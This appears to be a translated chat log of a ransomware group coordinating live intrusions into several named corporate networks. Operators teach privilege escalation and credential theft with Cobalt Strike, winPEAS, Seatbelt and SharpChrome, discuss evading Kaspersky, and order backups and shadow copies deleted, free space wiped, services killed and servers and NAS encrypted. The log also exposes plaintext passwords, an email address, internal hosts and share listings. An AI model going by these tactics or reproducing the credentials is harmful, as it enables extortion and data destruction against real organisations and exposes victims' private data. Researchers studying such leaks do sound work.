yes, from the session appearing to the DC
by the way, where are the other 2 users?
a question on the level of "what if stalin were alive now"
for example, privilege escalation over the average life of one session, from 1 minute to 4 hours?
well, just once watch from the side
what to do after the first session appears?
the order of actions for what?)
well, the order of actions
which actions exactly?
will there be a "master class" with a description of the actions?
I don't know what exactly to write up here: what's required in the user's context or tied to it (browsers, winscp, putty etc) you do from the user's context, what requires system rights (hashdump, logonpasswords) from system
please answer the question
that's quite possible when you've already tried everything
never used it, but it should be in your arsenal anyway because it might turn out to be the last vulnerability to escalate privileges with)
you have a mindmap made and you can search for the needed info by the item you're currently on
depends on the task. if your session dies, you look at which AV; if you need to rdp to a target machine, idletime, etc
the most useful info is precisely passwords and hashes, because at minimum you'll have a dictionary for brute, and at maximum you try to reach other hashes/passwords from system
for that you'll use exploits, uac bypass, spoolsv etc.
yes
the point is that you can't do a hashdump without system rights, right?
passwords, hashes
that's why I asked the question, what to pay attention to
winpeas has a lot of info about privilege escalation via dllhijack - this technique in general, how often is it used in real life?
is it worth bothering with it?
you analyze info badly
how did the password end up here...
```
Target : MicrosoftOffice16_Data:orgid:simon.bolley@gpj.com
UserName :
Password : Canada!75
CredentialType : Generic
PersistenceType : LocalComputer
LastWriteTime : 1/21/2020 9:16:27 AM
```
right away we open your seatbelt on gpj
of course))
I don't think passwords have ever shown up in winPEAS and seatbelt
the modules above answer these questions
the question is where they are and how to get them
maximum benefit - passwords
here, from observations, what I pulled out of them into chat, what was useful and what was worth pulling out
I mean, apart from the list of shares, AV and so on, what will be useful to pull out?
there everything is laid out by category
right away a link to the site with a description
https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
as an option, idletime to check when the user's last activity was before going in via rdp
2-1) got an error - googled it; over time you'll learn the popular errors (cobaltstrike error 5 - If you get an error 5 (access denied) after you try to link to a Beacon) 2-2) passwords and "interesting" files that may contain passwords. you can also look for internal portals that may be vulnerable (like sql injection), which will let you open a session on the server 2-3) didn't understand the question 2-4) let's leave the question for now 2-5) didn't understand the question 2-6) cob adds this info when you scan hosts via portscan and cob sees the OS, it automatically adds it to Targets, the Hashdump command adds hashes, etc.
yes, like apart from the default AdFind and other collectors, what can be used in low priv?
can you write up by tools which are better to use in which contexts
on 2-2 I agree; maybe in `group` instead of `all` it makes sense to specify something else in some cases?
Same about winPEAS: the output is gigantic, but what's most useful to pull out?
first, questions on the knowledge and experience you already have
ok, then how to understand `break down the network`?
first let's understand what `break down the network` means, then you'll catch the gist and we'll go through vectors)
VladislavHolding said in telegram that we were taught to break down the network, which tools are better to use and in which cases (at least a couple, for studying them in more detail)
regarding 1, I can assume, judging by how you work, that after creating tokens you don't return yourself to the original context. And the modules require queries to the domain
`psinject` - `This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process`
1) This was taken from PowerView via psinject :^), but the thing is it popped up with Invoke-Kerberoast too, and SMBAutoBrute
This release integrates Lee's work with Beacon. The `powerpick [cmdlet+args]` command will spawn a process, inject the Unmanaged PowerShell magic into it, and run the requested command. I've also added `psinject [pid] [arch] [command]` to Beacon as well. This command will inject the Unmanaged PowerShell DLL into a specific process and run the command you request. This is ideal for long-running jobs or injecting PowerShell-based agents (e.g., Empire) into a specific process
1) what module? 2) all the capabilities are on the official git page and there's a clear help there) 3) psinject executes ps code in another process, which rules out killing the session if the execution of ps code is detected in the system 4) don't know, never used that argument) 5) `execute-assembly /SharpChrome.exe logins /showall`
1. This error:
```
ERROR: Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect.
ERROR: "
ERROR: At line:13117 char:24
ERROR: + else { $Results = $GPOSearcher.FindAll() }
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DirectoryServicesCOMException
ERROR:
```
What is its problem? How to get around it? What does it mean? 2. "rubeus is a more serious tool ;-)" What other functions does it have besides asreproast and kerberoast? What's the main difference between powerpick and psinject, if you say the second is better than the first, but yesterday in PowerView the first worked, unlike the second? What's the point of the `/privileges:enable` argument for `wmic` if you specify LA/DA creds? 5. How to work with SharpChrome, not SharpWeb, but Chrome specifically. It has the clearest help; however many attempts there were, in vain
so, what?
20 minutes to prepare a list
the first hour we'll go over general questions regarding software, vectors, etc.
hi
:space_invader:
Good morning
morning; waiting for now, this week we'll get both sessions and a new tool.
what about sessions?
good afternoon all )
maybe I'll find creds on space work
through this program it only backs up to the computer; looking in the browser, maybe there'll be something
and check the cloud sync settings please
does it back up to san1?
and look at the software install date please
lol)
a bit more
```
Teemo[FILES]Administrator */4144|2021Feb02 02:03:39> idle
[Tasked beacon to run .NET program: IdleTime.exe
[+] host called home, sent: 111147 bytes
[+] received output:
CurrentUser : FILES\Administrator
Idletime : 08h:09m:20s:125ms (0 milliseconds)
```
not yet)
want to drop in via rdp and look at the gui?
that happens, try throwing it from another box
The proxy is barely alive, some pages take five minutes to open
didn't find the admin panel?)
interesting thing
```
http://10.69.0.22:5000/ --------------------------- nas
https://10.69.0.173/login.html ------------------------- idrac-HYPERVDEV2|PowerEdge R320
https://10.69.0.70/login.html --------------------------- idrac-7ND5CZ1 | PowerEdge R520
```
in the history there was lastpass, but no creds; I thought his creds would fit, I wrote so as not to lock it in the future
was lastpass in his browser?
to `https://lastpass.com`
where?
Logan has lastpass, but the password `M@ythe4th!` didn't fit
2 domains out of 3-4 PCs
yes, work in that domain already; once you've prepared, I'll give you sessions from the 2 prod domains
so there are two more domains there? only one trust is visible
first climb in here and work there
```
Pinging AD1.overland.com [10.69.0.35] with 32 bytes of data:
Reply from 10.69.0.35: bytes=32 time=10ms TTL=127
Ping statistics for 10.69.0.35:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
beacon> portscan 10.69.0.35 445 none
[*] Tasked beacon to scan ports 445 on 10.69.0.35
[+] host called home, sent: 93285 bytes
[+] received output:
10.69.0.35:445
Scanner module is complete
```
user9
tl2
from
got in touch
I know it's a NAS)
just in case
okay
there was only the documents directory, the rest were already empty
it's a NAS after all
were they empty or did you clean them out?
```
Directory of \\89.0.10.104\Music
04/10/2019 04:05 PM .
04/10/2019 04:01 PM ..
0 File(s) 0 bytes
2 Dir(s) 1,660,207,595,520 bytes free
[+] received output:
Volume in drive \\89.0.10.104\Pictures is Pictures
Volume Serial Number is 8C90-29F2
Directory of \\89.0.10.104\Pictures
04/10/2019 04:05 PM .
04/10/2019 04:01 PM ..
0 file(s) 0 bytes
2 Dir(s) 1,660,207,595,520 bytes free
beacon> shell dir \\89.0.10.104\Videos
[*] Tasked beacon to run: dir \\89.0.10.104\Videos
[+] host called home, sent: 55 bytes
[+] received output:
Volume in drive \\89.0.10.104\Videos is Videos
Volume Serial Number is 42A8-E058
Directory of \\89.0.10.104\Videos
04/10/2019 04:05 PM .
04/10/2019 04:01 PM ..
0 file(s) 0 bytes
2 Dir(s) 1,660,207,595,520 bytes free
```
so either they somehow rolled it back, or we didn't close it
was it running during the lock?
I'm on it via rdp
not closed for some reason
should rdp onto the server, map the disk and run through it with the utility
I'll go in now
prompt
work through this cob
otherwise they'll drop
better not to spawn
there are about 10 alive there in total
3056
```
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
rtpco.local
```
I have no live ones
throw it at me
in no cob at all?
no others?
and delete the shadow copies
and wipe the free space there after deleting the backup
one person is needed here
made a note) thanks
fine, if it's deleted, screw it
yes
```
beacon> help mv
Use: mv [source file] [dest file]
Move source file to the specified destination
beacon> help cp
Use: cp [source file] [dest file]
Copy source file to the specified destination
```
and cp, I think
cob, by the way, also knew mv
yes
and what about del?
shell del, of course
so
just rm works in cob but shell rm won't
ok, interesting....
the thing is, through the command it won't let you delete, but through the gui everything deletes fine
but it's weird shit that it doesn't let you change but lets you delete)))
check the other folders
delete it
access is denied
I can't understand what the hell: copy and move don't work, but deleting works
ok
maybe you move them somewhere and encrypt them?
yes
seriously?
+
does it let you?
or maybe just delete them and not bother?
the one on the NAS
will it overwrite it?
echo 1 > the oldest backup file
this
Yes
are the other files also held by processes?
as I understood, no rights to these files; there are write rights there
I also have this error on 2 types
so what?
or only the last 1?
does everyone have this error?
and why are you surprised it didn't work)
akses iz denaid
renamed?
@tl2 said it depends on the edition + he said it protects the process, and you did it through map
.
was kasper on the workstations here?
Swallowed it right down to the frame))))
I told you kasper chomps dicks)) @tl2
add that extension to them
and rename the files on the NAS
and a re-run on the servers where the process didn't finish?
all 5 are still alive
already
and run it from there
or on a live workstation
on the server where there's a session
in the old ones everything encrypted fine and you could see it working, but this one's like a terminator
map this NAS
no, there it seems everything was similar; only part of the files got closed?
in the old networks
you mean the same?
?
see, it just uploaded
is there one at the moment?
well, I was dropping a file there from the DC under creds and from a server under other creds (creds and boxes from different domains)
is there definitely write access?
yesterday I mapped it on 2 boxes, today after checking I mapped it on 3 more and re-ran on 5 boxes
was it the same before that?
+ DC
on 5 different boxes
where was the NAS mapped?
the rest are all alive
was there a map on them?
well, a few boxes dropped off
?
file 300 kb
if it says it's corrupt then ok
it opens
and open it
the one that's not closed
grab 1 doc file
were there no session drops?
it sees VirtualAlloc and that's it
the injection principles themselves get burned
and in the end you have a session but you can't even inject anything
even a malicious process)
as soon as a process is created, kasper starts protecting it
got it
so you "create" a process rather than inject into another one
it sets up the staging channel from its own file
beacon "in itself"
no
but isn't beacon injected?
and it won't let you inject in any way (well, it can let a binary launch through if it's cleaned properly
well, it's purely a question of edition there
Never met it, but with kaspers even comet flies through))
plus it starts onboot, you can't kill it
it'll let the session through but won't let you inject
no, kasper is really very angry when set up properly; it depends on the edition
Isn't it bitdefender
was on the admin computer
the strongest AV is kasper in terms of mem integrity
maybe you're confusing again
kasper or kaseya?
we won't bypass kasper with an inject
damn, kasper is bad
did they crank up its protection or what
symantec has gotten pretty bitey lately
Kasper Endpoint was on some of them here
symantec - very formidable
and what about the AV at wilsonart?
and 1 each on 2 others)
3 people will work with it
so with wilsonart it's not so simple)
we have problems; wilsonart has 6 more trusts
there's access everywhere, but either dl crashes or traffic is blocked
yes
there are two more with rights
+ 2 more
or will new ones arrive?
so only #wilsonart-com is left
tomorrow 3 networks per day are planned)
tomorrow for 51.done.rtpcompany.com
tomorrow by what time?
well done
all
a decent EDR solution, and it sat around in the network so uselessly
that kaseya got owned is like balm)
```
winona.rtpco.local 118 boxes by AD
64 workstations on windows (10 alive)
53 servers (71 alive)
everything pulled in and everything encrypted
```
excellent
I meant not pulled in, but mapped and critical processes killed
```
8 servers not pulled in
```
us.alloypolymers.com closed servers 24 out of 24, workstations pulled all 23; rtpco.local closed servers 64 out of 65, workstations pulled all 152; one DC fell off
wait, it counted some crap
a second
not all
how many by AD
not all
that's not the whole stat
closed
write how many were pinging
yes, preparing the stat
```
rtpco.local 65 servers 152 workstations
```
```
us.alloypolymers.com workstations 23 servers 24
```
8 servers not pulled in
done?
so, what
there it's also processed
is there E
at least temp and sys32
and the other disk?
type D or maybe there's some other one there?
and it didn't touch the Windows folder
yeah?
as I understand it doesn't go there
both there and there
```
06/19/2019 07:00 PM Windows Defender
06/10/2020 01:13 AM Windows Mail
06/10/2020 01:13 AM Windows Media Player
07/16/2016 07:23 AM Windows Multimedia Platform
07/16/2016 07:23 AM Windows NT
06/10/2020 01:13 AM Windows Photo Viewer
07/16/2016 07:23 AM Windows Portable Devices
07/16/2016 07:23 AM WindowsPowerShell
```
but in program files and program files x86 it didn't touch this
today's date everywhere
to look
you can check the touch dates of files and folders by hand
respawn?
the appearance of the note isn't a guarantee that the locker went through the whole disk
```
I had 1 die, but the readme appeared on it
```
if at the same time the process the inject went into dropped, then the locker stopped accordingly
and afterwards the process didn't drop?
it appeared before that
I had 1 die, but the readme appeared on it
and stats for all domains
sessions didn't crash on inject?
basically, we bypassed kaseya while leisurely puffing away?
apparently)) from joy
why are you yelling
if it's everywhere, you can smack the DC then too = )
CHECKED
README IS THERE
finish off the DC too
when everything else dies
do we hit the DC?
them last, as always
well, except the DC
@tl1 @tl2?,
lock everything at once
are there sqls
yeah, there are
sqls too
some other services that could hold important data
nothing to add to the batch file there?
just in case, I remind you not to forget to kill the services on the mapped boxes
if you have questions, it's written up
you have a roadmap after all)
of course
rjytxyj
map?
What's above can't be pulled in @tl1
thanks
rtpco.local
guys, send adusers from all domains
Try to pull in
I moved the cob from #wilsonart-com, just don't kill it
PULL IN ALL DISKS
don't forget WOL
so, do we start?
work here some more then
https://www.alibisecurity.com/alibi-central-management-software
`http://10.0.0.202/doc/page/login.asp` - ALIBI
`http://10.0.0.21/`
please
thanks
user7
and forgot to delete because the brain isn't working even at 20% due to such a lovely work schedule
just so you know, this ntds isn't related to hashes, it's a thing from mimi for google password keys
more precisely, they were above
no, a question, or did you do something
who launched it
great, if it slips out of someone's head when calculating salary it'll be fine, apparently
it slipped my mind
No idea
questions above
what?
@user3 @user8
I'm nowhere
the network is small, it worked there for 10 seconds at most...
where else did you run it?
the chance of a drop after running it is many times higher
bh without parameters makes a LOT of noise
how many times have I written: at the end of the work day, delete files, sessions to sleep
dunno, it's not me
why deleted
```
199.4KB file 01/25/2021 17:31:02 msupdate.dll
1.2KB file 01/25/2021 17:39:36 ntds.pvk
```
Did you collect bloodhound?
If yes, then without parameters
?
how did you collect it? what were the launch parameters?
```
[+] Location: C:\Windows\Temp\*
Size Type Last Modified Name
---- ---- ------------------- ----
dir 01/25/2021 19:03:15 F18AC62B-E695-47FF-B459-2750FF73338D-Sigs
dir 01/01/2021 13:35:09 WinSAT
1.5MB file 01/25/2021 19:14:36 MpCmdRun.log
773.6KB file 01/25/2021 19:03:34 MpSigStub.log
199.4KB file 01/25/2021 17:31:02 msupdate.dll
1.2KB file 01/25/2021 17:39:36 ntds.pvk
256.0KB file 10/14/2020 17:41:18 TS_784C.tmp
320.0KB file 10/14/2020 17:41:29 TS_A6D2.tmp
1.0MB file 11/17/2020 08:43:16 UpdHealthTools.msi
```
why are you working so dirty?
everything as before, creds only from 1 NAS
+
add everyone to expFederal.com, we're going to close it after all
At least I can't
This is some kind of lab, nothing can be done in it
```
https://cloudgw.cpcc.edu/vpn/index.html
```
and what about this one?)
Of course
rjytxyj)
are you with them?
I don't see the conv
yes, I'll create it
expFederal.com = hobbes?
does it need a chat room?

\\USCHI-HD001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-HD001.Hobbes.loc\C$ - Default share \\USCHI-HD001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-HD001.Hobbes.loc\print$ - Printer Drivers \\USCHI-APG003.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-APG003.Hobbes.loc\C$ - Default share \\USCHI-APG003.Hobbes.loc\E$ - Default share \\USCHI-APG003.Hobbes.loc\F$ - Default share \\USCHI-APG003.Hobbes.loc\IPC$ - Remote IPC \\PCHIVHH001.Hobbes.loc\ADMIN$ - Remote Admin \\PCHIVHH001.Hobbes.loc\C$ - Default share \\PCHIVHH001.Hobbes.loc\E$ - Default share \\PCHIVHH001.Hobbes.loc\IPC$ - Remote IPC \\PCHIVHH001.Hobbes.loc\V$ - Default share \\PCHIAPG015.Hobbes.loc\ADMIN$ - Remote Admin \\PCHIAPG015.Hobbes.loc\C$ - Default share \\PCHIAPG015.Hobbes.loc\IPC$ - Remote IPC \\USCHI-MAXP001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-MAXP001.Hobbes.loc\C$ - Default share \\USCHI-MAXP001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-MAXP001.Hobbes.loc\M$ - Default share \\USCHI-MAXP001.Hobbes.loc\print$ - Printer Drivers \\USCHI-LT002.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-LT002.Hobbes.loc\C$ - Default share \\USCHI-LT002.Hobbes.loc\IPC$ - Remote IPC \\USCHI-NET005.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-NET005.Hobbes.loc\C$ - Default share \\USCHI-NET005.Hobbes.loc\E$ - Default share \\USCHI-NET005.Hobbes.loc\IPC$ - Remote IPC \\USCHI-NET005.Hobbes.loc\print$ - Printer Drivers \\PCHIFSP001.Hobbes.loc\ADMIN$ - Remote Admin \\PCHIFSP001.Hobbes.loc\Apps - \\PCHIFSP001.Hobbes.loc\ARCH - \\PCHIFSP001.Hobbes.loc\C$ - Default share \\PCHIFSP001.Hobbes.loc\Cad - \\PCHIFSP001.Hobbes.loc\Citrix - Citrix Profiles \\PCHIFSP001.Hobbes.loc\CIVIL - \\PCHIFSP001.Hobbes.loc\COMM - \\PCHIFSP001.Hobbes.loc\COMP - \\PCHIFSP001.Hobbes.loc\CONST - \\PCHIFSP001.Hobbes.loc\D$ - Default share \\PCHIFSP001.Hobbes.loc\ELEC - \\PCHIFSP001.Hobbes.loc\EXEC - \\PCHIFSP001.Hobbes.loc\F$ - Default share \\PCHIFSP001.Hobbes.loc\FS-0043 - \\PCHIFSP001.Hobbes.loc\FS-0044 - \\PCHIFSP001.Hobbes.loc\HR - 
\\PCHIFSP001.Hobbes.loc\IPC$ - Remote IPC \\PCHIFSP001.Hobbes.loc\IROA - IROA - ActiveInk Docs \\PCHIFSP001.Hobbes.loc\MARKET - \\PCHIFSP001.Hobbes.loc\MECH - \\PCHIFSP001.Hobbes.loc\MKTG - Business Operations \\PCHIFSP001.Hobbes.loc\NASUtils - PowerVault NAS Utilities \\PCHIFSP001.Hobbes.loc\Network - \\PCHIFSP001.Hobbes.loc\Pccommon - \\PCHIFSP001.Hobbes.loc\proj_ae - \\PCHIFSP001.Hobbes.loc\proj_cvl - \\PCHIFSP001.Hobbes.loc\proj_str - \\PCHIFSP001.Hobbes.loc\PTW6512 - \\PCHIFSP001.Hobbes.loc\Restricted$ - \\PCHIFSP001.Hobbes.loc\Safety - \\PCHIFSP001.Hobbes.loc\SCANS - \\PCHIFSP001.Hobbes.loc\SECTLDR - \\PCHIFSP001.Hobbes.loc\Software$ - expFederal Software \\PCHIFSP001.Hobbes.loc\Standard - \\PCHIFSP001.Hobbes.loc\STRUCT - \\PCHIFSP001.Hobbes.loc\Sys - Project Folders \\PCHIFSP001.Hobbes.loc\TENGCNST - \\PCHIFSP001.Hobbes.loc\User$ - Users Folders \\USCHI-NET001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-NET001.Hobbes.loc\C$ - Default share \\USCHI-NET001.Hobbes.loc\E$ - Default share \\USCHI-NET001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-NET001.Hobbes.loc\print$ - Printer Drivers \\USCHI-NET001.Hobbes.loc\Software$ - \\USCHI-NET001.Hobbes.loc\USCHI-PLT-0008 - Oce ColorWare Plotter 300 \\USCHI-MSE001.Hobbes.loc\address - \\USCHI-MSE001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-MSE001.Hobbes.loc\C$ - Default share \\USCHI-MSE001.Hobbes.loc\E$ - Default share \\USCHI-MSE001.Hobbes.loc\F$ - Default share \\USCHI-MSE001.Hobbes.loc\G$ - Default share \\USCHI-MSE001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-MSE004.Hobbes.loc\address - \\USCHI-MSE004.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-MSE004.Hobbes.loc\C$ - Default share \\USCHI-MSE004.Hobbes.loc\E$ - Default share \\USCHI-MSE004.Hobbes.loc\F$ - Default share \\USCHI-MSE004.Hobbes.loc\G$ - Default share \\USCHI-MSE004.Hobbes.loc\IPC$ - Remote IPC \\USCHI-APG004.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-APG004.Hobbes.loc\Analytics_c8466842-1a17-4bad-abad-7d935647974b - \\USCHI-APG004.Hobbes.loc\C$ - Default share 
\\USCHI-APG004.Hobbes.loc\E$ - Default share \\USCHI-APG004.Hobbes.loc\F$ - Default share \\USCHI-APG004.Hobbes.loc\gthrsvc_c8466842-1a17-4bad-abad-7d935647974b-crawl-0 - Crawled Files Sharec8466842-1a17-4bad-abad-7d935647974b-crawl-0 \\USCHI-APG004.Hobbes.loc\IPC$ - Remote IPC \\USCHI-APG004.Hobbes.loc\print$ - Printer Drivers \\USCHI-DCG002.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-DCG002.Hobbes.loc\C$ - Default share \\USCHI-DCG002.Hobbes.loc\IPC$ - Remote IPC \\USCHI-DCG002.Hobbes.loc\print$ - Printer Drivers \\PCHIWSG005.Hobbes.loc\ADMIN$ - Remote Admin \\PCHIWSG005.Hobbes.loc\AM - \\PCHIWSG005.Hobbes.loc\AMM3EXT$ - BC-Meridian Extensions Share \\PCHIWSG005.Hobbes.loc\C$ - Default share \\PCHIWSG005.Hobbes.loc\F$ - Default share \\PCHIWSG005.Hobbes.loc\IPC$ - Remote IPC \\PCHIAPG016.Hobbes.loc\ADMIN$ - Remote Admin \\PCHIAPG016.Hobbes.loc\C$ - Default share \\PCHIAPG016.Hobbes.loc\IPC$ - Remote IPC \\PCHIAPG016.Hobbes.loc\SophosUpdate - \\PCHIAPG016.Hobbes.loc\SUMInstallSet - Sophos Update Manager Installer \\USCHI-PWD001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-PWD001.Hobbes.loc\C$ - Default share \\USCHI-PWD001.Hobbes.loc\E$ - Default share \\USCHI-PWD001.Hobbes.loc\F$ - Default share \\USCHI-PWD001.Hobbes.loc\G$ - Default share \\USCHI-PWD001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-DCP001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-DCP001.Hobbes.loc\C$ - Default share \\USCHI-DCP001.Hobbes.loc\DAG01.hobbes.loc - File share witness created for microsoft exchange database availability group DAG01. 
\\USCHI-DCP001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-DCP001.Hobbes.loc\NETLOGON - Logon server share \\USCHI-DCP001.Hobbes.loc\SYSVOL - Logon server share \\PCHIAPG014.Hobbes.loc\ActiveAdministrator - Active Administrator Server Share \\PCHIAPG014.Hobbes.loc\ADMIN$ - Remote Admin \\PCHIAPG014.Hobbes.loc\BEW-4ecbc619f6de49a39b3bda9cec5b9074 - Push Directory \\PCHIAPG014.Hobbes.loc\C$ - Default share \\PCHIAPG014.Hobbes.loc\DADevicePolicyMaster$ - DADevicePolicyMaster$ share \\PCHIAPG014.Hobbes.loc\E$ - Default share \\PCHIAPG014.Hobbes.loc\IPC$ - Remote IPC \\PCHIAPG014.Hobbes.loc\Logs$ - Logs$ share \\PCHIAPG014.Hobbes.loc\SLDAClient$ - SLDAClient$ share \\PCHIAPG014.Hobbes.loc\Slogic$ - \\PCHIAPG014\SLOGIC$ share \\PCHIAPG014.Hobbes.loc\SLscripts$ - SLscripts$ share \\PCHIWSG007.Hobbes.loc\ADMIN$ - Remote Admin \\PCHIWSG007.Hobbes.loc\C$ - Default share \\PCHIWSG007.Hobbes.loc\IPC$ - Remote IPC \\USCHI-DCG003.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-DCG003.Hobbes.loc\C$ - Default share \\USCHI-DCG003.Hobbes.loc\IPC$ - Remote IPC \\USCHI-DCG003.Hobbes.loc\NETLOGON - Logon server share \\USCHI-DCG003.Hobbes.loc\SYSVOL - Logon server share \\USCHI-BKP001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-BKP001.Hobbes.loc\C$ - Default share \\USCHI-BKP001.Hobbes.loc\D$ - Default share \\USCHI-BKP001.Hobbes.loc\E$ - Default share \\USCHI-BKP001.Hobbes.loc\F$ - Default share \\USCHI-BKP001.Hobbes.loc\G$ - Default share \\USCHI-BKP001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-BKP001.Hobbes.loc\print$ - Printer Drivers \\USCHI-PRT001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-PRT001.Hobbes.loc\C$ - Default share \\USCHI-PRT001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-PRT001.Hobbes.loc\print$ - Printer Drivers \\USCHI-PRT001.Hobbes.loc\USCHI-PL_OCECW300 - Plotters NAME should not contain "_" per vendor recommendation \\USCHI-PRT001.Hobbes.loc\USCHI-PL_OCECW300_PS - USCHI-PL_OCECW300_PS \\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045 - South - Canon iR-ADV C5045/5051 PCL6 
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045_PS - South - Canon iR-ADV C50455051 PS3 \\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255 - North - Canon iR-ADV C5250/5255 PCL6 \\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255_PS - North - Canon iR-ADV C52505 PS3 \\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530 - South - HP Color LaserJet CM3530 \\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530_PS - South - HP Color LaserJet CM3530 PS \\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525 - HR Area - HP Color LaserJet CP3525 PCL6 \\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525_PS - HR Area - HP Color LaserJet CP3525 PS \\USCHI-MAXD001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-MAXD001.Hobbes.loc\C$ - Default share \\USCHI-MAXD001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-MAXD001.Hobbes.loc\M$ - Default share \\USCHI-MSE003.Hobbes.loc\address - \\USCHI-MSE003.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-MSE003.Hobbes.loc\C$ - Default share \\USCHI-MSE003.Hobbes.loc\E$ - Default share \\USCHI-MSE003.Hobbes.loc\F$ - Default share \\USCHI-MSE003.Hobbes.loc\G$ - Default share \\USCHI-MSE003.Hobbes.loc\IPC$ - Remote IPC \\USCHI-SQL001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-SQL001.Hobbes.loc\C$ - Default share \\USCHI-SQL001.Hobbes.loc\E$ - Default share \\USCHI-SQL001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-SQL001.Hobbes.loc\print$ - Printer Drivers \\DT-000037.Hobbes.loc\ADMIN$ - Remote Admin \\DT-000037.Hobbes.loc\C$ - Default share \\DT-000037.Hobbes.loc\IPC$ - Remote IPC \\PCHIWSG006.Hobbes.loc\70182862-e52d-4fb0-bea2-3448c35de88f-query-0 - Used by Microsoft Search Server 2010 to copy index files between servers. 
\\PCHIWSG006.Hobbes.loc\ADMIN$ - Remote Admin \\PCHIWSG006.Hobbes.loc\C$ - Default share \\PCHIWSG006.Hobbes.loc\IPC$ - Remote IPC \\USCHI-MSE002.Hobbes.loc\address - \\USCHI-MSE002.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-MSE002.Hobbes.loc\C$ - Default share \\USCHI-MSE002.Hobbes.loc\E$ - Default share \\USCHI-MSE002.Hobbes.loc\F$ - Default share \\USCHI-MSE002.Hobbes.loc\G$ - Default share \\USCHI-MSE002.Hobbes.loc\IPC$ - Remote IPC \\USCHI-DCG001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-DCG001.Hobbes.loc\C$ - Default share \\USCHI-DCG001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-DCG001.Hobbes.loc\NETLOGON - Logon server share \\USCHI-DCG001.Hobbes.loc\SYSVOL - Logon server share \\PCHIDCG004.Hobbes.loc\ADMIN$ - Remote Admin \\PCHIDCG004.Hobbes.loc\C$ - Default share \\PCHIDCG004.Hobbes.loc\IPC$ - Remote IPC \\PCHIDCG004.Hobbes.loc\NETLOGON - Logon server share \\PCHIDCG004.Hobbes.loc\slETL$ - \\PCHIDCG004.Hobbes.loc\SYSVOL - Logon server share \\USCHI-LSS001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-LSS001.Hobbes.loc\C$ - Default share \\USCHI-LSS001.Hobbes.loc\Extreme_Loading_for_Structures - Extreme Loading┬" for Structures \\USCHI-LSS001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-SPS001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-SPS001.Hobbes.loc\Analytics_8bda09f0-8cbc-4c38-8854-922eb0553239 - \\USCHI-SPS001.Hobbes.loc\C$ - Default share \\USCHI-SPS001.Hobbes.loc\E$ - Default share \\USCHI-SPS001.Hobbes.loc\gthrsvc_8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0 - Crawled Files Share8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0 \\USCHI-SPS001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-NWA001.Hobbes.loc\ADMIN$ - Remote Admin \\USCHI-NWA001.Hobbes.loc\C$ - Default share \\USCHI-NWA001.Hobbes.loc\E$ - Default share \\USCHI-NWA001.Hobbes.loc\IPC$ - Remote IPC \\USCHI-NWA001.Hobbes.loc\KC$ - \\USCHI-NWA001.Hobbes.loc\Netwrix_Auditor_Subscriptions$ - This is a default share for uploading Netwrix Auditor subscriptions. 
